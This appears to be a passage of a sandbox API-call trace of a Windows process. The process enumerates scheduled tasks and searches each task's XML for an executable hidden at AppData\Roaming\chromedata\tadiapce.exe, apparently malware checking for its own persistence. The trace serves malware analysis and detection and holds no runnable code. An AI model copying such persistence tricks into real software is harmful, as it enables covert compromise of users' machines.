	[0073.126] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.126] IUnknown:Release (This=0x22c0048) returned 0x0
	[0073.126] IUnknown:Release (This=0x55fea8) returned 0x0
	[0073.126] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fea8) returned 0x0
	[0073.126] ITaskFolderCollection:get_Count (in: This=0x55fea8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.126] IUnknown:Release (This=0x55fea8) returned 0x0
	[0073.126] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.126] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.127] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.127] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.127] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.127] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="PolicyConverter") returned 0x0
	[0073.127] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.129] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.129] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.129] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.129] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="VerifiedPublisherCertStoreCheck") returned 0x0
	[0073.129] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.131] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.131] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.131] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.131] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.132] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.132] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.132] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.132] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x3, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.132] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe70) returned 0x0
	[0073.132] IRegisteredTaskCollection:get_Count (in: This=0x55fe70, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.132] IRegisteredTaskCollection:get_Item (in: This=0x55fe70, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff78) returned 0x0
	[0073.132] IRegisteredTask:get_Name (in: This=0x55ff78, pName=0x128e3c | out: pName=0x128e3c*="AitAgent") returned 0x0
	[0073.132] IRegisteredTask:get_Xml (in: This=0x55ff78, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.134] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.134] IUnknown:Release (This=0x55ff78) returned 0x0
	[0073.134] IRegisteredTaskCollection:get_Item (in: This=0x55fe70, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff78) returned 0x0
	[0073.134] IRegisteredTask:get_Name (in: This=0x55ff78, pName=0x128e3c | out: pName=0x128e3c*="ProgramDataUpdater") returned 0x0
	[0073.135] IRegisteredTask:get_Xml (in: This=0x55ff78, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.136] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.137] IUnknown:Release (This=0x55ff78) returned 0x0
	[0073.137] IUnknown:Release (This=0x55fe70) returned 0x0
	[0073.137] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe70) returned 0x0
	[0073.137] ITaskFolderCollection:get_Count (in: This=0x55fe70, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.137] IUnknown:Release (This=0x55fe70) returned 0x0
	[0073.137] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.137] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x4, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.137] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.138] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.138] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.138] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="Proxy") returned 0x0
	[0073.138] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
